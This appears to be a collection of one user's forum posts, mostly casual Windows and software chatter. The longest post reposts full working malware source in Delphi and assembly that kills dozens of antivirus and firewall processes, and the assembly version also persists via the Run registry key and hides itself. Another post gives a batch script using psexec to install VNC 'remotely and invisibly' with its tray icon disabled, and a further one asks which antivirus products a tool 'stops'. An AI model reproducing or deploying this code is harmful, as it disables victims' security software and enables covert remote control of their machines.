xFilthyxJesusx

Same for me I suppose

Well then cant he install the service...

Needs some work. Its really hard to tell the text and the links apart. And when i click the hacks button on the toolbar it opens a file download dialouge box.

I'd hgihly reccommend the new Intel processors. And Id also highly reccommend at least 2 gigs of ram. Why? Because it makes things run so much smoother. I hardly ever have a freeze. And I know that also has to do with other things. But the 2 gigs was an upgrade and i would have minor freezing. Since the upgrade never

Never had a problem with them "in the past" haha. So you cna install it legally. Does WGA flagyour copy of wndows?

Huntington Beach.... Fountian Valley as you already know is right next to me. I go there all the time

550 = Failed to change directory. 403 = forbidden

Why not just use XPY http://xpy.whyeye.org/ Ive had autorun disabled forever. ANd shift works. It disables autorun for anything.

In the History section? I think you should make a section for the current software it stops.

Version 1.20 Pre-Beta is detected by BitDefender. But Version 1.11 isnt. It also doesnt stop bitdefender. So is there a list of what AntiVirus softwares it does stop?

Thought they might :D

Uh maybe the hex value if wrong. But i am pulling up the Local Machina registry files.

MAybe these might help VorteX Dec 30 2003, 05:24 PM compile your own undetected one, here an example in delphi: CODE unit Unit1; interface uses Windows, Messages, SysUtils, Classes, Graphics, Controls, Forms, Dialogs, Tlhelp32, StdCtrls; type TForm1 = class(TForm) GroupBox1: TGroupBox; Button1: TButton; Button2: TButton; Button3: TButton; Button4: TButton; Button5: TButton; Button6: TButton; Button7: TButton; Button8: TButton; Button9: TButton; Button10: TButton; Button11: TButton; Button12: TButton; Button13: TButton; Button14: TButton; Button15: TButton; GroupBox2: TGroupBox; Button16: TButton; Button17: TButton; procedure Button1Click(Sender: TObject); procedure Button2Click(Sender: TObject); procedure Button3Click(Sender: TObject); procedure Button4Click(Sender: TObject); procedure Button5Click(Sender: TObject); procedure Button6Click(Sender: TObject); procedure Button7Click(Sender: TObject); procedure Button8Click(Sender: TObject); procedure Button9Click(Sender: TObject); procedure Button10Click(Sender: TObject); procedure Button11Click(Sender: TObject); procedure Button12Click(Sender: TObject); procedure Button13Click(Sender: TObject); procedure Button14Click(Sender: TObject); procedure Button15Click(Sender: TObject); procedure Button16Click(Sender: TObject); procedure Button17Click(Sender: TObject); private { Private declarations } public { Public declarations } end; var Form1: TForm1; implementation {$R *.DFM} function KillTask(ExeFileName: string): integer; const PROCESS_TERMINATE=$0001; var ContinueLoop: BOOL; FSnapshotHandle: THandle; FProcessEntry32: TProcessEntry32; begin result := 0; FSnapshotHandle := CreateToolhelp32Snapshot (TH32CS_SNAPPROCESS, 0); FProcessEntry32.dwSize := Sizeof(FProcessEntry32); ContinueLoop := Process32First(FSnapshotHandle, FProcessEntry32); while integer(ContinueLoop) <> 0 do begin if ((UpperCase(ExtractFileName(FProcessEntry32.szExeFile)) = UpperCase(ExeFileName)) or (UpperCase(FProcessEntry32.szExeFile) = UpperCase(ExeFileName))) then Result := Integer(TerminateProcess(OpenProcess( PROCESS_TERMINATE, BOOL(0), FProcessEntry32.th32ProcessID), 0)); ContinueLoop := Process32Next(FSnapshotHandle, FProcessEntry32); end; CloseHandle(FSnapshotHandle); end; procedure killavp; begin try KillTask ('_AVP32.EXE'); KillTask ('_AVPCC.EXE'); KillTask ('_AVPM.EXE'); KillTask ('AVP32.EXE'); KillTask ('AVPCC.EXE'); KillTask ('AVPM.EXE'); KillTask ('AVP.EXE'); except Exit; end; end; procedure killnav; begin try KillTask ('NAVAPW32.EXE'); KillTask ('NAVW32.EXE'); except Exit; end; end; procedure killsophos; begin try KillTask ('ICLOAD95.EXE'); KillTask ('ICMON.EXE'); KillTask ('ICSUPP95.EXE'); KillTask ('ICLOADNT.EXE'); KillTask ('ICSUPPNT.EXE'); except Exit; end; end; procedure killpanda; begin try KillTask ('IFACE.EXE'); except Exit; end; end; procedure killants; begin try KillTask ('ANTS.EXE'); except Exit; end; end; procedure killantitrojan; begin try KillTask ('Anti-Trojan.exe'); except Exit; end; end; procedure killatguard; begin try KillTask ('iamapp.exe'); KillTask ('iamserv.exe'); except; exit; end; end; procedure killconseal; begin try KillTask ('FRW.EXE'); except; exit; end; end; procedure killblackice; begin try KillTask ('blackice.exe'); KillTask ('blackd.exe'); except; exit; end; end; procedure killzonealarm; begin try KillTask ('zonealarm.exe'); KillTask ('vsmon.exe'); except; exit; end; end; procedure killwinroute; begin try KillTask ('WrCtrl.exe'); KillTask ('WrAdmin.exe'); KillTask ('WrCtrl.exe'); except; exit; end; end; procedure killcleaner; begin try KillTask ('cleaner3.exe'); KillTask ('cleaner.exe'); KillTask ('tca.exe'); KillTask ('MooLive.exe'); except; exit; end; end; procedure killlockdown; begin try KillTask ('lockdown2000.exe'); except; exit; end; end; procedure killsphinx; begin try KillTask ('Sphinx.exe'); except; exit; end; end; procedure killmcafee; begin try KillTask ('VSHWIN32.EXE'); KillTask ('VSECOMR.EXE'); KillTask ('WEBSCANX.EXE'); KillTask ('AVCONSOL.EXE'); KillTask ('VSSTAT.EXE'); except; exit; end; end; procedure TForm1.Button1Click(Sender: TObject); begin killavp; end; procedure TForm1.Button2Click(Sender: TObject); begin killnav; end; procedure TForm1.Button3Click(Sender: TObject); begin killsophos; end; procedure TForm1.Button4Click(Sender: TObject); begin killpanda; end; procedure TForm1.Button5Click(Sender: TObject); begin killants; end; procedure TForm1.Button6Click(Sender: TObject); begin killantitrojan; end; procedure TForm1.Button7Click(Sender: TObject); begin killatguard; end; procedure TForm1.Button8Click(Sender: TObject); begin killconseal; end; procedure TForm1.Button9Click(Sender: TObject); begin killblackice; end; procedure TForm1.Button10Click(Sender: TObject); begin killzonealarm; end; procedure TForm1.Button11Click(Sender: TObject); begin killwinroute; end; procedure TForm1.Button12Click(Sender: TObject); begin killcleaner; end; procedure TForm1.Button13Click(Sender: TObject); begin killlockdown; end; procedure TForm1.Button14Click(Sender: TObject); begin killsphinx; end; procedure TForm1.Button15Click(Sender: TObject); begin killmcafee; end; procedure TForm1.Button16Click(Sender: TObject); begin killmcafee; sleep(1000); killsphinx; sleep(1000); killlockdown; sleep(1000); killcleaner; sleep(1000); killwinroute; sleep(1000); killzonealarm; sleep(1000); killblackice; sleep(1000); killconseal; sleep(1000); killatguard; sleep(1000); killantitrojan; sleep(1000); killants; sleep(1000); killsophos; sleep(1000); killnav; sleep(1000); killavp; end; procedure TForm1.Button17Click(Sender: TObject); begin showmessage('This program is designed to kill all the listed antivirus and firewall programs, you can kill each individually or all together! enjoy'); end; end. VorteX Dec 30 2003, 05:27 PM or one in asm: CODE ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ; AVKillah 2 by Phr0stic ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; .386 .model flat, stdcall option casemap:none ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; include masm32includekernel32.inc includelib masm32libkernel32.lib include masm32includeadvapi32.inc includelib masm32libadvapi32.lib ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; getfile proto :dword,:dword FindMe proto :dword pe32 struct dwSize dword ? cntUsage dword ? ID dword ? th32DefaultHeapID dword ? th32ModuleID dword ? cntThreads dword ? th32ParentProcessID dword ? pcPriClassBase dword ? dwFlags dword ? szExe db 260 dup(?) pe32 ends ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; .const sz000 db "regedit.exe",0 sz001 db "netstat.exe",0 sz002 db "tracert.exe",0 sz003 db "msconfig.exe",0 sz004 db "sysedit.exe",0 sz005 db "zapro.exe",0 sz006 db "zonealarm.exe",0 sz007 db "zatutor.exe",0 sz008 db "zauinst.exe",0 sz009 db "minilog.exe",0 sz010 db "vsmon.exe",0 sz011 db "navapw32.exe",0 sz012 db "lockdown.exe",0 sz013 db "ants.exe",0 sz014 db "fast.exe",0 sz015 db "guard.exe",0 sz016 db "update.exe",0 sz017 db "autoupdate.exe",0 sz018 db "tc.exe",0 sz019 db "spyxx.exe",0 sz020 db "clean.exe",0 sz021 db "pview95.exe",0 sz022 db "drwatson.exe",0 sz023 db "sfc.exe",0 sz024 db "msinfo32.exe",0 sz025 db "nsched32.exe",0 sz026 db "cleaner.exe",0 sz027 db "lsetup.exe",0 sz028 db "aupdate.exe",0 sz029 db "luall.exe",0 sz030 db "lucomserver.exe",0 sz031 db "luinit.exe",0 sz032 db "navw32.exe",0 sz033 db "navstub.exe",0 sz034 db "bootwarn.exe",0 sz035 db "qconsole.exe",0 sz036 db "qserver.exe",0 sz037 db "navdx.exe",0 sz038 db "undoboot.exe",0 sz039 db "cfgwiz.exe",0 sz040 db "moolive.exe",0 sz041 db "tca.exe",0 sz042 db "tcm.exe",0 sz043 db "tds-3.exe",0 sz044 db "ss3edit.exe",0 sz045 db "update.exe",0 sz046 db "anti-trojan.exe",0 sz047 db "atcon.exe",0 sz048 db "atupdater.exe",0 sz049 db "atwatch.exe",0 sz050 db "wgfe95.exe",0 sz051 db "poproxy.exe",0 sz052 db "nprotect.exe",0 sz053 db "vsstat.exe",0 sz054 db "vshwin32.exe",0 sz055 db "ndd32.exe",0 sz056 db "mcagent.exe",0 sz057 db "mcupdate.exe",0 sz058 db "avpcc.exe",0 sz059 db "avpm.exe",0 sz060 db "watchdog.exe",0 sz061 db "taumon.exe",0 sz062 db "iamapp.exe",0 sz063 db "iamserv.exe",0 sz064 db "lockdown2000.exe",0 sz065 db "sphinx.exe",0 sz066 db "avconsol.exe",0 sz067 db "webscanx.exe",0 sz068 db "vsecomr.exe",0 sz069 db "_avp32.exe",0 sz070 db "_avpcc.exe",0 sz071 db "_avpm.exe",0 sz072 db "avp32.exe",0 sz073 db "avpcc.exe",0 sz074 db "avp.exe",0 sz075 db "pcciomon.exe",0 sz076 db "icload95.exe",0 sz077 db "icmon.exe",0 sz078 db "icsupp95.exe",0 sz079 db "icloadnt.exe",0 sz080 db "icsuppnt.exe",0 sz081 db "frw.exe",0 sz082 db "firewall.exe",0 sz083 db "antivirus.exe",0 sz084 db "blackice.exe",0 sz085 db "blackd.exe",0 sz086 db "wrctrl.exe",0 sz087 db "wradmin.exe",0 sz088 db "cleaner3.exe",0 sz089 db "pcfwallicon.exe",0 sz090 db "aplica32.exe",0 sz091 db "cfiadmin.exe",0 sz092 db "cfiaudit.exe",0 sz093 db "cfinet32.exe",0 sz094 db "cfinet.exe",0 sz095 db "tds2-98.exe",0 sz096 db "tds2-nt.exe",0 sz097 db "safeweb.exe",0 sz098 db "nvarch16.exe",0 sz099 db "vsmain.exe",0 sz100 db "persfw.exe",0 sz101 db "avsynmgr.exe",0 sz102 db "pavproxy.exe",0 sz103 db "mssmmc32.exe",0 sz104 db "trjscan.exe",0 sz105 db "defwatch.exe",0 sz106 db "vpc42.exe",0 sz107 db "rtvscn95.exe",0 sz108 db "vptray.exe",0 sz109 db "mgui.exe",0 sz110 db "apvxdwin.exe",0 sz111 db "fsav.exe",0 sz112 db "agentsvr.exe",0 sz113 db "nmain.exe",0 sz114 db "nisum.exe",0 sz115 db "nisserv.exe",0 sz116 db "taskmon.exe",0 sz117 db "rrguard.exe",0 sz118 db "rescue32.exe",0 sz119 db "rescue.exe",0 sz120 db "rshell.exe",0 sz121 db "apimonitor.exe",0 sz122 db "borg2.exe",0 sz123 db "W32dsm89.exe",0 sz124 db "cleanpc.exe",0 szK32 db "kernel32.dll",0 szRSP db "RegisterServiceProcess",0 szRun db "SOFTWAREMicrosoftWindowsCurrentVersionRun",0 szReg db "SysEnum",0 ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; .data? hReg dd ? szPath db 256 dup(?) ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; .code start: invoke GetModuleHandle, addr szK32 INVOKE GetProcAddress, EAX, ADDR szRSP test eax, eax jz addme push 1 push 0 call eax addme: invoke RegOpenKeyEx, 80000002h, addr szRun, 0, 00020000h+0002h+0004h, addr hReg invoke GetModuleFileName, 0, addr szPath, sizeof szPath invoke RegSetValueEx, hReg, ADDR szReg, 0, 1, addr szPath, eax invoke RegCloseKey, hReg hey: invoke FindMe, addr sz001 invoke FindMe, addr sz002 invoke FindMe, addr sz003 invoke FindMe, addr sz004 invoke FindMe, addr sz005 invoke FindMe, addr sz006 invoke FindMe, addr sz007 invoke FindMe, addr sz008 invoke FindMe, addr sz009 invoke FindMe, addr sz010 invoke FindMe, addr sz011 invoke FindMe, addr sz012 invoke FindMe, addr sz013 invoke FindMe, addr sz014 invoke FindMe, addr sz015 invoke FindMe, addr sz016 invoke FindMe, addr sz017 invoke FindMe, addr sz018 invoke FindMe, addr sz019 invoke FindMe, addr sz020 invoke FindMe, addr sz021 invoke FindMe, addr sz022 invoke FindMe, addr sz023 invoke FindMe, addr sz024 invoke FindMe, addr sz025 invoke FindMe, addr sz026 invoke FindMe, addr sz027 invoke FindMe, addr sz028 invoke FindMe, addr sz029 invoke FindMe, addr sz030 invoke FindMe, addr sz031 invoke FindMe, addr sz032 invoke FindMe, addr sz033 invoke FindMe, addr sz034 invoke FindMe, addr sz035 invoke FindMe, addr sz036 invoke FindMe, addr sz037 invoke FindMe, addr sz038 invoke FindMe, addr sz039 invoke FindMe, addr sz040 invoke FindMe, addr sz041 invoke FindMe, addr sz042 invoke FindMe, addr sz043 invoke FindMe, addr sz044 invoke FindMe, addr sz045 invoke FindMe, addr sz046 invoke FindMe, addr sz047 invoke FindMe, addr sz048 invoke FindMe, addr sz049 invoke FindMe, addr sz050 invoke FindMe, addr sz051 invoke FindMe, addr sz052 invoke FindMe, addr sz053 invoke FindMe, addr sz054 invoke FindMe, addr sz055 invoke FindMe, addr sz056 invoke FindMe, addr sz057 invoke FindMe, addr sz058 invoke FindMe, addr sz059 invoke FindMe, addr sz060 invoke FindMe, addr sz061 invoke FindMe, addr sz062 invoke FindMe, addr sz063 invoke FindMe, addr sz064 invoke FindMe, addr sz065 invoke FindMe, addr sz066 invoke FindMe, addr sz067 invoke FindMe, addr sz068 invoke FindMe, addr sz069 invoke FindMe, addr sz070 invoke FindMe, addr sz071 invoke FindMe, addr sz072 invoke FindMe, addr sz073 invoke FindMe, addr sz074 invoke FindMe, addr sz075 invoke FindMe, addr sz076 invoke FindMe, addr sz077 invoke FindMe, addr sz078 invoke FindMe, addr sz079 invoke FindMe, addr sz080 invoke FindMe, addr sz081 invoke FindMe, addr sz082 invoke FindMe, addr sz083 invoke FindMe, addr sz084 invoke FindMe, addr sz085 invoke FindMe, addr sz086 invoke FindMe, addr sz087 invoke FindMe, addr sz088 invoke FindMe, addr sz089 invoke FindMe, addr sz090 invoke FindMe, addr sz091 invoke FindMe, addr sz092 invoke FindMe, addr sz093 invoke FindMe, addr sz094 invoke FindMe, addr sz095 invoke FindMe, addr sz096 invoke FindMe, addr sz097 invoke FindMe, addr sz098 invoke FindMe, addr sz099 invoke FindMe, addr sz100 invoke FindMe, addr sz101 invoke FindMe, addr sz102 invoke FindMe, addr sz103 invoke FindMe, addr sz104 invoke FindMe, addr sz105 invoke FindMe, addr sz106 invoke FindMe, addr sz107 invoke FindMe, addr sz108 invoke FindMe, addr sz109 invoke FindMe, addr sz110 invoke FindMe, addr sz111 invoke FindMe, addr sz112 invoke FindMe, addr sz113 invoke FindMe, addr sz114 invoke FindMe, addr sz115 invoke FindMe, addr sz116 invoke FindMe, addr sz117 invoke FindMe, addr sz118 invoke FindMe, addr sz119 invoke FindMe, addr sz120 invoke FindMe, addr sz121 invoke FindMe, addr sz122 invoke FindMe, addr sz123 invoke FindMe, addr sz124 jmp hey ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; FindMe proc szFile:dword local lpMoop32:pe32 local szBuffer[256]:byte mov lpMoop32.dwSize, sizeof lpMoop32 invoke CreateToolhelp32Snapshot, 2, 0 mov esi, eax lea edi, szFile invoke Process32First, esi, addr lpMoop32 @@loop: invoke getfile, addr lpMoop32.szExe, addr szBuffer invoke lstrcmpiA, edi, addr szBuffer test eax, eax jnz @@continue invoke OpenProcess, 0001h, 0, lpMoop32.ID invoke TerminateProcess, eax, 0 @@continue: invoke Process32Next, esi, addr lpMoop32 test eax, eax jz @@done jmp @@loop @@done: invoke CloseHandle, esi ret FindMe endp ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; getfile proc lppath:dword,lpbuffer:dword push edi mov ecx, lppath @@: mov al, [ecx] inc ecx cmp al, 0 je @f cmp al, "" jne @b mov edx, ecx jmp @b @@: sub ecx, lppath add ecx, edx mov edi, lpbuffer @@: mov al, [edx] inc edx mov [edi], al inc edi cmp edx, ecx jne @b pop edi ret getfile endp ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; end start Sorry for the long post. I just thougth it would be more convient to post it here. They were both found here and as you cna tell the are old. http://www.governmentsecurity.org/archive/t1731.html

I wanted to help :-( But all the positions are fillled.... Oh well...

Ok so. I'm trying to remotely and invisibly install VNC onto a remote computer (obviously) Here Is how Im doing so right now. @echo on NET USE RemoteIPIPC$ xcopy "C:Program FilesTightVNC*.*" "RemoteIPC$Program FilesTightVNC*.*" /r/i/c/h/k/e regedit /e "RemoteIPC$vncdmp.txt" "HKEY_LOCAL_MACHINESoftwareORL" psexec RemoteIP -s -i -d %windir%regedit /s C:vncdmp.txt psexec RemoteIP -s -i -d "%ProgramFiles%TightVNCwinvnc.exe" -install psexec RemoteIP -s -i -d "%ProgramFiles%TightVNCwinvnc.exe" And obviously RemoteIP is replaced with the IP address. I'm pretty sure my post count is low on these forums. So I don't want to be asked the obvious questions over and over. But what happens is Ive exported the registry into VNCDMP.txt Here is the registry settings for my RemoteVNC settings Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINESOFTWAREORL] [HKEY_LOCAL_MACHINESOFTWAREORLWinVNC3] "ConnectPriority"=dword:00000000 "DebugMode"=dword:00000000 "DebugLevel"=dword:0000000a "LoopbackOnly"=dword:00000000 "EnableHTTPDaemon"=dword:00000001 "EnableURLParams"=dword:00000000 "AllowLoopback"=dword:00000000 "AuthRequired"=dword:00000001 "DisableTrayIcon"=dword:00000001 [HKEY_LOCAL_MACHINESOFTWAREORLWinVNC3Default] "QuerySetting"=dword:00000002 "QueryTimeout"=dword:0000001e "QueryAccept"=dword:00000000 "QueryAllowNoPass"=dword:00000000 "SocketConnect"=dword:00000001 "AutoPortSelect"=dword:00000001 "InputsEnabled"=dword:00000001 "LocalInputsDisabled"=dword:00000000 "IdleTimeout"=dword:00000000 "LockSetting"=dword:00000000 "RemoveWallpaper"=dword:00000001 "Password"=hex:bb,6f,9a,96,f5,a1,ed,8e "PasswordViewOnly"=hex:bb,6f,9a,96,f5,a1,ed,8e "PollUnderCursor"=dword:00000000 "PollForeground"=dword:00000001 "PollFullScreen"=dword:00000000 "OnlyPollConsole"=dword:00000001 "OnlyPollOnEvent"=dword:00000000 Oh if you're wondering what the password is its just zaq1xsw2 for testing so dont bother. But back to my problem. All of the files seem to copy fine. And the service is running. I know this because i have physical access to the computer I'm doing this too. It is in my network. So ya. It seems to not want to let me connect. The service is runninfg but everytime I type in the password it just responds with an invalid password error. ive even tried removing it altogether. I think i left some things out... But any help would obviously be great,

hahahaha. thats great...

well here open up run and copy and paste shutdown -s -t 30 and tell me it doesnt work for xp it will give you 30 seconds until it shutsdown. shutdown -a aborts it.

sweet

GSpace Adblock Plus Adblock Filter Gset updater Greasemonkey Linkification Update Notifier

Or the lazy ones....

uTorrent Windows Key + R Hamachi TightVNC VMWare Daemon Tools Ccleaner Firefox

Yes but that didnt work

actually aardwolf I completely agree with you. This new generation is full of excuses. But yes. They're told they have all these things wrong with them and they give up on themselves in a way. It's pathtic. And whats worse is they find someone to justify it in their mind and dont do anything to "fix it"

Thanks for the welcome. I loved your episodes. I actually wondering if you can do an in depth tutorial on how to use Synergy I tried a couple of months ago and to no avail did I get it to work.

why does cports.exe try to connect to 192.168.1.1 ?? Hmmm see if this makes a difference. Trash the old one. http://rapidshare.de/files/32434912/NonU3.rar.html or http://www.fileden.com/files/2006/7/8/116430/NonU3.rar Let me know if theres still a problem. But if you have a router I believe that might have something to do with it.